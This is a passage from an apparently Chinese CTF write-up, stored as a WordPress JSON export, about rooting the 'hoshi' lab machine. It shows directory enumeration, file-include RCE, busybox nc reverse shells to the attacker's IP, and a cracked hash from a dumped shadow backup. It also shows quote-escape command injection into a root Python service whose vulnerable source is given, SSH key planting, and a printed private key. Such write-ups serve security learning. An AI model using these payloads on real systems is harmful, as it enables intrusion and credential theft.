'\/uploads\/';\n $metadata_file = $upload_dir . 'feedbacks.json';\n $del_file = basename($_POST['delete_file']);\n $del_path = $upload_dir . $del_file;\n if (is_file($del_path) && strpos($del_file, '.txt') !== false) {\n @unlink($del_path);\n \/\/ \u540c\u6b65\u5220\u9664 feedbacks.json \u4e2d\u7684\u8bb0\u5f55\n if (file_exists($metadata_file)) {\n $feedbacks = json_decode(file_get_contents($metadata_file), true);\n if (is_array($feedbacks)) {\n $feedbacks = array_filter($feedbacks, function($fb) use ($del_file) {\n return $fb['filename'] !== $del_file;\n });\n file_put_contents($metadata_file, json_encode(array_values($feedbacks), JSON_PRETTY_PRINT));\n }\n }\n \/\/ \u5220\u9664\u540e\u5237\u65b0\u9875\u9762\uff0c\u9632\u6b62\u91cd\u590d\u63d0\u4ea4\n header('Location: ' . $_SERVER['REQUEST_URI']);\n exit;\n }\n}\n\n\/\/ \u9875\u9762\u4e3b\u5185\u5bb9\u8f93\u51fa\u5b8c\u6bd5\u540e\u518d\u751f\u6210\u9759\u6001\u9875\u9762\nif (isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true) {\n $page_content = ob_get_contents();\n file_put_contents(__DIR__ . '\/admin.html', $page_content);\n echo '<div style="display:none" id="static-tip">[debug] \u9759\u6001\u9875\u9762\u5df2\u751f\u6210<\/div>';\n}\nob_end_flush();\n?><\/code><\/pre>\n\u8fd9\u91cc\u5141\u8bb8php<\/code>\u4ee3\u7801\u6267\u884c\uff0c\u4f1a\u8f6c\u4e49\u76f8\u5173\u4ee3\u7801\u751f\u6210\u9759\u6001\u754c\u9762\uff0c\u4f46\u662f\u4e0d\u4f1a\u8f6c\u4e49\u6587\u4ef6\u540d\uff0c\u8fd9\u4e2a\u5012\u662f\u8bd5\u51fa\u6765\u4e86\u3002<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u4f7f\u7528\u6587\u4ef6\u5305\u542b\u5f39\u56deshell\uff01<\/p>\n
\u5c1d\u8bd5\u4f7f\u7528\u5bc6\u7801\u767b\u5f55admin.php<\/code>\uff0c\u7136\u540e\u5c1d\u8bd5\u6587\u4ef6\u5305\u542b\uff0c\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u8fd9\u662f\u56e0\u4e3a\u53cd\u9988\u4fe1\u606f\u53cd\u9988\u5230\u7684\u662fadmin.html<\/code>\uff0c\u5728\u6e90\u4ee3\u7801\u53ef\u4ee5\u770b\u51fa\u6765\uff0c\u4f46\u662f\u6211\u4eec\u505a\u7684\u65f6\u5019\u4e0d\u77e5\u9053\uff0c\u8fd9\u91cc\u5fc5\u987b\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ dirsearch -u http:\/\/$IP\/ 2>\/dev\/null\n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/hoshi\/reports\/http_192.168.10.106\/__25-06-25_20-59-25.txt\n\nTarget: http:\/\/192.168.10.106\/\n\n[20:59:25] Starting: \n[20:59:27] 403 - 279B - \/.ht_wsr.txt\n[20:59:27] 403 - 279B - \/.htaccess.bak1\n[20:59:27] 403 - 279B - \/.htaccess.orig\n[20:59:27] 403 - 279B - \/.htaccess.sample\n[20:59:27] 403 - 279B - \/.htaccess.save\n[20:59:27] 403 - 279B - \/.htaccess_orig\n[20:59:27] 403 - 279B - \/.htaccess_extra\n[20:59:27] 403 - 279B - \/.htaccess_sc\n[20:59:27] 403 - 279B - \/.htaccessBAK\n[20:59:27] 403 - 279B - \/.htaccessOLD2\n[20:59:27] 403 - 279B - \/.htaccessOLD\n[20:59:27] 403 - 279B - \/.htm\n[20:59:27] 403 - 279B - \/.html\n[20:59:27] 403 - 279B - \/.htpasswd_test\n[20:59:27] 403 - 279B - \/.htpasswds\n[20:59:27] 403 - 279B - \/.httr-oauth\n[20:59:28] 403 - 279B - \/.php\n[20:59:33] 200 - 1KB - \/admin.php\n[20:59:33] 200 - 2KB - \/admin.html\n[20:59:53] 200 - 23KB - \/info.php\n[21:00:06] 200 - 109B - \/robots.txt\n[21:00:07] 403 - 279B - \/server-status\/\n[21:00:07] 403 - 279B - \/server-status\n[21:00:13] 301 - 318B - \/uploads -> http:\/\/192.168.10.106\/uploads\/\n[21:00:13] 200 - 681B - \/uploads\/\n\nTask Completed<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884cRCE\uff0c\u6210\u529f\u3002\u3002\u3002\u3002<\/p>\n
http:\/\/192.168.10.106\/hoshi\/gift.php?file=admin.html&0=whoami<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/192.168.10.106\/hoshi\/gift.php?file=admin.html&0=busybox%20nc%20192.168.10.107%201234%20-e%20bash\nhttp:\/\/192.168.10.106\/hoshi\/gift.php?file=admin.html&0=busybox nc 192.168.10.107 1234 -e bash<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h1>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n
\u4e0a\u4f20linpeas.sh<\/code>\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff0c\u53ef\u4ee5\u7ffb\u5230\uff1a<\/p>\n(remote) www-data@hoshi:\/var\/backups$ ls -la\ntotal 52\ndrwxr-xr-x 2 root root 4096 Jun 20 13:03 .\ndrwxr-xr-x 12 root root 4096 Apr 1 10:05 ..\n-rw-r--r-- 1 root root 23836 Apr 11 22:03 apt.extended_states.0\n-rw-r--r-- 1 root root 2556 Apr 4 22:55 apt.extended_states.1.gz\n-rw-r--r-- 1 root root 2006 Apr 1 10:05 apt.extended_states.2.gz\n-rw-r--r-- 1 root root 1542 Apr 1 03:53 apt.extended_states.3.gz\n-rw-r--r-- 1 root root 757 Mar 30 21:29 apt.extended_states.4.gz\n-rw-r--r-- 1 root root 943 Mar 30 21:29 shadow~\n(remote) www-data@hoshi:\/var\/backups$ cat shadow~ \nroot:$6$TfSlMzl8\/eUh9mY0$wVygBx94VuTMRZq016O3IPG2mn1e.MFz2WKK.pACuy\/Sa1dTHqu0vWtbTBrt\/Q8dIWGBeYrY90ERemhYElKHv1:20190:0:99999:7:::\ndaemon:*:20166:0:99999:7:::\nbin:*:20166:0:99999:7:::\nsys:*:20166:0:99999:7:::\nsync:*:20166:0:99999:7:::\ngames:*:20166:0:99999:7:::\nman:*:20166:0:99999:7:::\nlp:*:20166:0:99999:7:::\nmail:*:20166:0:99999:7:::\nnews:*:20166:0:99999:7:::\nuucp:*:20166:0:99999:7:::\nproxy:*:20166:0:99999:7:::\nwww-data:*:20166:0:99999:7:::\nbackup:*:20166:0:99999:7:::\nlist:*:20166:0:99999:7:::\nirc:*:20166:0:99999:7:::\ngnats:*:20166:0:99999:7:::\nnobody:*:20166:0:99999:7:::\n_apt:*:20166:0:99999:7:::\nsystemd-timesync:*:20166:0:99999:7:::\nsystemd-network:*:20166:0:99999:7:::\nsystemd-resolve:*:20166:0:99999:7:::\nsystemd-coredump:!!:20166::::::\nmessagebus:*:20166:0:99999:7:::\nsshd:*:20166:0:99999:7:::\nwelcome:$6$geD2QaGnx\/AiHPAb$8ihVmhNA1GIUFbAkCuUp.KzsUuzAztIlrYNbPFoyORE9U9dsf\/L13AuCNpqkJSxu0HG4ltlhJFJKU2Y1Gj8Sg.:20259:0:99999:7:::<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash\nWarning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"\nUse the "--format=HMAC-SHA256" option to force loading these as that type instead\nUsing default input encoding: UTF-8\nLoaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128\/128 SSE2 2x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 4 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nloveme2 (welcome) \n1g 0:00:00:12 0.16% (ETA: 23:21:28) 0.07955g\/s 2158p\/s 2260c\/s 2260C\/s 071184..gazza\nUse the "--show" option to display all of the cracked passwords reliably\nSession aborted\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ cat hash \nroot:$6$TfSlMzl8\/eUh9mY0$wVygBx94VuTMRZq016O3IPG2mn1e.MFz2WKK.pACuy\/Sa1dTHqu0vWtbTBrt\/Q8dIWGBeYrY90ERemhYElKHv1:20190:0:99999:7:::\nwelcome:$6$geD2QaGnx\/AiHPAb$8ihVmhNA1GIUFbAkCuUp.KzsUuzAztIlrYNbPFoyORE9U9dsf\/L13AuCNpqkJSxu0HG4ltlhJFJKU2Y1Gj8Sg.:20259:0:99999:7:::<\/code><\/pre>\n\u5207\u6362\u7528\u6237\uff0c\u6210\u529f\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743root<\/h2>\nwelcome@hoshi:~$ ls -la\ntotal 24\ndrwx------ 2 welcome welcome 4096 Jun 20 13:01 .\ndrwxr-xr-x 3 root root 4096 Apr 11 22:27 ..\nlrwxrwxrwx 1 root root 9 Jun 20 10:13 .bash_history -> \/dev\/null\n-rw-r--r-- 1 welcome welcome 220 Apr 11 22:27 .bash_logout\n-rw-r--r-- 1 welcome welcome 3526 Apr 11 22:27 .bashrc\n-rw-r--r-- 1 welcome welcome 807 Apr 11 22:27 .profile\n-rw-r--r-- 1 root root 44 Jun 20 10:13 user.txt\nwelcome@hoshi:~$ cat user.txt \nflag{user-73b671a5f913d849d405784a428288dd}\nwelcome@hoshi:~$ sudo -l\nMatching Defaults entries for welcome on hoshi:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser welcome may run the following commands on hoshi:\n (ALL) NOPASSWD: \/usr\/bin\/python3 \/root\/12345.py\nwelcome@hoshi:~$ sudo \/usr\/bin\/python3 \/root\/12345.py\nServer listening on port 12345...<\/code><\/pre>\n\u53d1\u73b0\u5f00\u653e\u4e86\u65b0\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ nc $IP 12345 \nconf> help\n=== Configuration Shell ===\n?\/help List available commands\nq\/quit Exit the shell\nread_config Read server configuration\nwrite_config Write to server configuration\nlist_files List files in \/opt directory\ncheck_status Check server status\nexec_cmd Execute allowed system commands (e.g., whoami, pwd)\n\nconf> exec_cmd whoami\nroot\n\nconf> list_files\nFiles in \/opt:\nserver.conf\nserver.log\n\nconf> exec_cmd cat \/root\/.ssh\/id_rsa\nError: 'cat \/root\/.ssh\/id_rsa' not in allowed commands: whoami, pwd, date, id<\/code><\/pre>\n\u770b\u4e00\u4e0b\u76f8\u5173\u65e5\u5fd7\u6587\u4ef6\uff1a<\/p>\n
welcome@hoshi:~$ cd \/opt\nwelcome@hoshi:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 2 root root 4096 Jun 20 13:30 .\ndrwxr-xr-x 18 root root 4096 Mar 18 20:37 ..\n-rw-r--r-- 1 root root 0 Jun 20 13:30 server.conf\n-rw-r--r-- 1 root root 490 Jun 25 21:18 server.log\nwelcome@hoshi:\/opt$ cat server.conf \nwelcome@hoshi:\/opt$ cat server.log\n[2025-06-25 21:17:19] ('192.168.10.107', 37166): Received: help\n[2025-06-25 21:17:34] ('192.168.10.107', 37166): Received: exec_cmd whoami\n[2025-06-25 21:17:34] ('192.168.10.107', 37166): Executing command: sh -c 'whoami'\n[2025-06-25 21:17:48] ('192.168.10.107', 37166): Received: exec_cmd cat \/root\/.ssh\/id_rsa\n[2025-06-25 21:17:48] ('192.168.10.107', 37166): Invalid command: cat \/root\/.ssh\/id_rsa\n[2025-06-25 21:18:27] ('192.168.10.107', 37166): Received: whoami | cat \/root\/.ssh\/id_rsa<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u76f8\u5173\u5f15\u53f7\uff0c\u5c1d\u8bd5\u8fdb\u884c\u624b\u52a8\u95ed\u5408\uff0c\u518d\u5c1d\u8bd5\u5e38\u7528\u7684\u529e\u6cd5\uff1a<\/p>\n
conf> exec_cmd whoami' | 'id\nError: Forbidden characters (;|&<>) detected.<\/code><\/pre>\n\u53d1\u73b0\u8fc7\u6ee4\u4e86\u5e38\u7528\u7684\u529e\u6cd5\uff0c\u8fd9\u91cc\u5b9e\u9645\u4e0a\u53c8\u662f\u4e00\u4e2a\u969c\u773c\u6cd5\u3002\u3002\u3002\u3002\u3002\u8bf7\u770b\u6e90\u4ee3\u7801\uff1a<\/p>\n
import socket\nimport subprocess\nimport os\nimport re\nimport time \n\nCONFIG_FILE = "\/opt\/server.conf"\nLOG_FILE = "\/opt\/server.log" \n\ndef init_files():\n if not os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, "w") as f:\n f.write("server_name: ctf_target\\nlog_file: \/opt\/server.log\\n")\n if not os.path.exists(LOG_FILE):\n with open(LOG_FILE, "w") as f:\n f.write("Server log initialized.\\n") \n\ndef log_action(action, client_addr):\n with open(LOG_FILE, "a") as f:\n timestamp = time.strftime("%Y-%m-%d %H:%M:%S")\n f.write(f"[{timestamp}] {client_addr}: {action}\\n") \n\ndef read_config():\n try:\n with open(CONFIG_FILE, "r") as f:\n return f.read().strip()\n except FileNotFoundError:\n return "Error: Config file not found."\n except Exception as e:\n return f"Error reading config: {str(e)}" \n\ndef write_config(data):\n try:\n\n if not re.match(r'^[a-zA-Z0-9\\s:._-]+$', data):\n return "Error: Invalid characters in input."\n with open(CONFIG_FILE, "a") as f:\n f.write(f"{data}\\n")\n return f"Written to config: {data}"\n except Exception as e:\n return f"Error writing config: {str(e)}" \n\ndef list_files():\n try:\n files = os.listdir("\/opt")\n return "Files in \/opt:\\n" + "\\n".join(files)\n except Exception as e:\n return f"Error listing files: {str(e)}" \n\ndef check_status():\n return """Service Status:\n- Running: Yes\n- Security: Advanced input validation enabled\n- Log: Active\n- Note: Command execution restricted to safe commands""" \n\ndef exec_cmd(cmd, client_addr):\n\n if re.search(r'[;|<>]', cmd):\n log_action(f"Blocked suspicious input: {cmd}", client_addr)\n return "Error: Forbidden characters (;|&<>) detected." \n\n allowed_cmds = ["whoami", "pwd", "date", "id"]\n base_cmd = cmd.split("'")[0].strip() \n if base_cmd not in allowed_cmds:\n log_action(f"Invalid command: {cmd}", client_addr)\n return f"Error: '{base_cmd}' not in allowed commands: {', '.join(allowed_cmds)}" \n try:\n\n full_cmd = f"sh -c '{cmd}'"\n log_action(f"Executing command: {full_cmd}", client_addr)\n result = subprocess.run(full_cmd, shell=True, capture_output=True, text=True, timeout=5)\n return result.stdout or result.stderr or "Command executed."\n except subprocess.TimeoutExpired:\n return "Error: Command timed out."\n except Exception as e:\n return f"Error executing command: {str(e)}" \n\ndef show_help():\n return """=== Configuration Shell ===\n?\/help List available commands\nq\/quit Exit the shell\nread_config Read server configuration\nwrite_config Write to server configuration\nlist_files List files in \/opt directory\ncheck_status Check server status\nexec_cmd Execute allowed system commands (e.g., whoami, pwd)\n""" \n\ndef handle_client(client_socket, client_addr):\n client_socket.send(b"conf> ")\n while True:\n try:\n data = client_socket.recv(1024).decode().strip()\n if not data:\n break \n log_action(f"Received: {data}", client_addr)\n parts = data.split(maxsplit=1)\n command = parts[0].lower() if parts else ""\n args = parts[1] if len(parts) > 1 else "" \n\n if command in ("?", "help"):\n response = show_help()\n elif command in ("q", "quit"):\n client_socket.send(b"Goodbye.\\n")\n break\n elif command == "read_config":\n response = f"Running 'cat {CONFIG_FILE}'\\n{read_config()}"\n elif command == "write_config":\n response = write_config(args) if args else "Error: write_config requires an argument."\n elif command == "list_files":\n response = list_files()\n elif command == "check_status":\n response = check_status()\n elif command == "exec_cmd":\n response = exec_cmd(args, client_addr) if args else "Error: exec_cmd requires an argument."\n else:\n response = "Unknown command. Type 'help' for commands." \n client_socket.send(f"{response}\\nconf> ".encode())\n except Exception as e:\n client_socket.send(f"Error: {str(e)}\\nconf> ".encode()) \n\ndef main():\n init_files()\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server.bind(("0.0.0.0", 12345))\n server.listen(5)\n print("Server listening on port 12345...") \n while True:\n try:\n client_socket, addr = server.accept()\n print(f"Connection from {addr}")\n handle_client(client_socket, addr)\n client_socket.close()\n print(f"Connection from {addr} closed")\n except KeyboardInterrupt:\n print("\\nShutting down server...")\n break\n except Exception as e:\n print(f"Server error: {str(e)}") \n server.close() \nif __name__ == "__main__":\n main()<\/code><\/pre>\n\u6ca1\u6709\u771f\u7684\u7981\u7528\u6389&<\/code>\u3002\u3002\u3002\u3002\u3002<\/p>\nconf> exec_cmd whoami' && ls -la && '\nroot\ntotal 12\ndrwxr-xr-x 2 root root 4096 Jun 20 13:30 .\ndrwxr-xr-x 18 root root 4096 Mar 18 20:37 ..\n-rw-r--r-- 1 root root 0 Jun 20 13:30 server.conf\n-rw-r--r-- 1 root root 2669 Jun 25 21:38 server.log<\/code><\/pre>\n\u6ca1\u62a5\u9519\u5c31\u662f\u597d\u4e8b\u3002\u3002<\/p>\n
conf> exec_cmd whoami' && ls -la \/root && '\nroot\ntotal 52\ndrwx------ 6 root root 4096 Jun 21 05:10 .\ndrwxr-xr-x 18 root root 4096 Mar 18 20:37 ..\n-rwxr-xr-x 1 root root 5307 Jun 20 10:09 12345.py\nlrwxrwxrwx 1 root root 9 Mar 18 21:18 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 4 root root 4096 Apr 4 22:04 .cache\n-rw-r--r-- 1 root root 272 Jun 21 05:08 congrats.txt\ndrwx------ 3 root root 4096 Apr 4 21:00 .gnupg\ndrwxr-xr-x 3 root root 4096 Mar 18 21:04 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw-r--r-- 1 root root 44 Jun 20 10:12 root.txt\ndrw------- 2 root root 4096 Apr 4 23:57 .ssh\n-rw------- 1 root root 0 Jun 21 05:10 .viminfo\n-rw------- 1 root root 51 Jun 21 00:26 .Xauthority\n\nconf> exec_cmd whoami' && ls -la \/root\/.ssh && '\nroot\ntotal 8\ndrw------- 2 root root 4096 Apr 4 23:57 .\ndrwx------ 6 root root 4096 Jun 21 05:10 ..\n\nconf> exec_cmd whoami' && \/usr\/bin\/busybox nc -e \/bin\/bash 192.168.10.107 2345 && \u2018\n\/bin\/sh: 1: Syntax error: Unterminated quoted string\n\nconf> exec_cmd id' && pwd && '\nuid=0(root) gid=0(root) groups=0(root)\n\/opt\n\nconf> exec_cmd id' && ssh-keygen -t rsa -b 4096 -f \/root\/.ssh\/id_rsa -N "" -q && '\nuid=0(root) gid=0(root) groups=0(root)\n\nconf> exec_cmd id' && ls -la \/root\/.ssh && '\nuid=0(root) gid=0(root) groups=0(root)\ntotal 16\ndrw------- 2 root root 4096 Jun 25 21:52 .\ndrwx------ 6 root root 4096 Jun 21 05:10 ..\n-rw------- 1 root root 3369 Jun 25 21:52 id_rsa\n-rw-r--r-- 1 root root 736 Jun 25 21:52 id_rsa.pub\n\nconf> exec_cmd id' && mv \/root\/.ssh\/id_rsa.pub \/root\/.ssh\/authorized_keys && '\nuid=0(root) gid=0(root) groups=0(root)\n\nconf> exec_cmd id' && ls -la \/root\/.ssh && '\nuid=0(root) gid=0(root) groups=0(root)\ntotal 16\ndrw------- 2 root root 4096 Jun 25 21:53 .\ndrwx------ 6 root root 4096 Jun 21 05:10 ..\n-rw-r--r-- 1 root root 736 Jun 25 21:52 authorized_keys\n-rw------- 1 root root 3369 Jun 25 21:52 id_rsa\n\nconf> exec_cmd id' && cat \/root\/.ssh\/id_rsa && '\nuid=0(root) gid=0(root) groups=0(root)\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAgEA73giWqEm20rtZndzEtt2txG\/QKUtorBUHYRej0Lt4zduE4w+jyte\ndeA8arshJBjDXQbhqc4EL17hF\/WdEUHY8CxTAqRgHTGQBXV2Y24F6xWxiR+1zSKEQmxWD6\n4dnZ3OH8AFUE31uviXYZPlSvm\/1WYTW1\/YmoxTIp9eV974v3r8SJJnm1xi0e8kDJuLRJf7\nfcTluOnq0f3XoGbXMHdjWNo73Z0a4k\/ZYydENh\/XErYVJIMQi36s04zVZw\/400RsC8PBIK\nfqIHvsxxGwQAyujb+yEjVZi5vH\/t+Kxt0BHOsSnIguU50pWIrsxWnc6BBYvI6bvddG\/TqN\nR9yn\/iEhuZwptvNXydYX3tlA8mHWSmDsilR0QslEq6yI3KSm80edyc7tOvKU5quofNEYoB\npKmU4exN+OWUQ+c79+r14\/RE10B9+kpHRhbi7R7+fZZ\/L+OzAiUoZmkOUVZQvE1viguky4\n8zCgQhuDQCZoODpyCmjc3WV\/OTAJrXq0yrZxH\/PelI8uo2zZM2MdEAsPVr8brms9PdUxf+\ntkZ0W2s06L4gr1ABXfpRhyfpAAGhSR+ywwq2xyvK\/grn\/OIdwOghsuqteULyDIfQW0DiPh\nV2FNkIf1xU9MH+wIAv2Lkogf8IZsKG2sCnTF5ZIrszGAfV+gM5PzQtamd6WOBbt3PAovev\n8AAAdALZwtfC2cLXwAAAAHc3NoLXJzYQAAAgEA73giWqEm20rtZndzEtt2txG\/QKUtorBU\nHYRej0Lt4zduE4w+jytedeA8arshJBjDXQbhqc4EL17hF\/WdEUHY8CxTAqRgHTGQBXV2Y2\n4F6xWxiR+1zSKEQmxWD64dnZ3OH8AFUE31uviXYZPlSvm\/1WYTW1\/YmoxTIp9eV974v3r8\nSJJnm1xi0e8kDJuLRJf7fcTluOnq0f3XoGbXMHdjWNo73Z0a4k\/ZYydENh\/XErYVJIMQi3\n6s04zVZw\/400RsC8PBIKfqIHvsxxGwQAyujb+yEjVZi5vH\/t+Kxt0BHOsSnIguU50pWIrs\nxWnc6BBYvI6bvddG\/TqNR9yn\/iEhuZwptvNXydYX3tlA8mHWSmDsilR0QslEq6yI3KSm80\nedyc7tOvKU5quofNEYoBpKmU4exN+OWUQ+c79+r14\/RE10B9+kpHRhbi7R7+fZZ\/L+OzAi\nUoZmkOUVZQvE1viguky48zCgQhuDQCZoODpyCmjc3WV\/OTAJrXq0yrZxH\/PelI8uo2zZM2\nMdEAsPVr8brms9PdUxf+tkZ0W2s06L4gr1ABXfpRhyfpAAGhSR+ywwq2xyvK\/grn\/OIdwO\nghsuqteULyDIfQW0DiPhV2FNkIf1xU9MH+wIAv2Lkogf8IZsKG2sCnTF5ZIrszGAfV+gM5\nPzQtamd6WOBbt3PAovev8AAAADAQABAAACAFWDdekdQQ3wPMRphWtHeaY4LS69jYVaKD9+\nJHJOOTr5cVKDs1dW6l13nLuUZWpJeYI\/0dfcXLw5ynHO4K7n77scaOw5nKTwLPj2EDfDc1\nOWpJZN\/5Lob4h0vWrOB39gedn2rS8XF9gTq6NJuAjFFM70q5bmrCfMUme7t2nzkqp2FZ8o\nwNzG6fcDycDCzsHI8CLibBJTXeptFlIOR2vkRlLVY6loz8\/fKcbxn7cgOaJR6UznjMHzk2\n3cDdzG5Fk1RswQtGef7sh42H3iAClvHeo6eTFtYbOsBogqdZk8FIiqHTROoRR0u+4FdjWs\n7xjjtXxoBI+PT6dgAFGYJ1llpW+8z61smli8dbGGTWmz+MSjTOPtVxaMuZh1fUjwv5PqrQ\nmZZDhssBG5LB4ELYRsZzgGimNyRLuhRJBVjZMfn2i8cx\/1iLXbEbTDc1crnq1iKDCvd4M7\n7Sqp5HbgdbDUFNR6Wff6msy4c3ZxbEyyiCGKOPf57pC\/GGOT\/AzQLIEJ3\/1+GLhbcNLLB9\nsZ7CmiE8cYbsC\/8ddkWyoHUWlwqC243XznHu4p59R+VtWgRDWTExwwRNGewR9uqrzTTCDB\nyOFl8hE8xi6WWLYGAxIqfMkwJacelCrfKNiSuwEsHluyh4wVWSlYw4WKdvQphVb+4yEMQ8\njOnOO5RR72OQMbn\/KBAAABAQCk5K5H0dSl34bG8nG9Y7XtkVNEgsPr+HEtqz9rMWFaEJM+\nt8GhTvBzNTpM6OUIptxuRDYL0ZQ4+Clqmh1s6iulBUnVN2bKL1tT3PdngFQ5E8obuTi4MT\nM8wCaf34Sfytk6c8wGq65+bCJIZF88g1r9tSYpJHAjLEwLBu+6BvTNUQdeCrZb48udaFxP\nme3YdF\/3b9lV1XvE21XXFYKYYcJCBgSsZ8SY0EcItPuTj11J76HWJaFAQwL1+6tp8z2PDc\nVcck2WGTVGDLCcKVE92Fa7oJ\/MXx3pTINqAB96xKhaKmAOluObD4XXAZfGKL4bRwRyebBg\nMf+yk\/EIr7XgQDpLAAABAQD5\/zZSXECB8b8rKJFLnce9GfV61Jbo+Mw60EPirMPmrFn7UW\nEDmIlV+pHTjpfnt\/ivFmT03hwzqv0xTlmwinCH5sX9WBZdwL5sopNxh6vJlnBguPV7Z\/0q\nBPPFXznUAJLKruN4MRHFOAOKEMfw18eswGucnUvQ5S5Ow86URYgL3l00GaQDAa024qIjfe\ni4WOt6ZaqaeFz0Gmr0ynh5AxER0I3D6dCDHlRkmE44T71T7k18qn4+JkN6UGbXrElw6Qwx\nxVPL94dctdvH194p9Ppm3SlaL3PM5gkR1GV31kD\/9DKxzSkqQPLZrQkRUalSr8T6yhru\/q\n+gRhdZuz1Qphc\/AAABAQD1ODTGvuYt2PvVcVKDHGx\/xgg9mpjVdFghd1TRES6ZaNdmrrkC\nQ\/RPFcS+xxMgUeMZR6UIGc9Ig8gBFGaODf8DoX1XBPISNpUTwRdzLnfn19b6VUh79GiTnh\nztTi4KXYf2y3ojMC2OTy\/TFPv6OMjXGjjDEXAVLFJRkFfUqmd55t35YrOmV51SH7y+IQ+I\n4kYxWYPGtgmH+x+yn387xbgerpKrncJfP2BvV7HhNHMUpQrt2125DUFbpJzK\/QxPMyGWLr\nB2yZgHiJFub1rxSKQqGbjYHwIhK6COP5Vio9hRMbGII3VhhmZPkJCAfkgpwCNYn7WfjOPh\nQuWVT5lhi2xBAAAACnJvb3RAaG9zaGk=\n-----END OPENSSH PRIVATE KEY-----\n\nconf> q\nGoodbye.<\/code><\/pre>\n<\/div><\/p>\nroot@hoshi:~# cat congrats.txt root.txt \nCongratulations, Hacker!\n\nYou've successfully pwned this target machine! \ud83c\udf89 \nYour skills are top-notch, and you've earned ultimate bragging rights.\n\nKeep hacking, keep learning, and check out more challenges at maze-sec.com!\nSee you in the next challenge!\n\n- Sublarge \n\nflag{root-5de923e57adefd6a1fd53a6705ad6486}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"hoshi \u505a\u7684\u597d\u7528\u5fc3\u554a\uff01 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi] \u2514 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-908","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/908","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=908"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/908\/revisions"}],"predecessor-version":[{"id":909,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/908\/revisions\/909"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=908"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=908"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=908"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"Pasted](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506260958419.png\")
<\/div>![\"Pasted](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506260958420.png\")
<\/div><\/p>\n![\"Pasted](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506260958421.png\")
<\/div><\/p>\n![\"Pasted](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506260958422.png\")
<\/div>![\"Pasted](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506260958423.png\")
<\/div><\/p>\n![\"Pasted](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506260958424.png\")
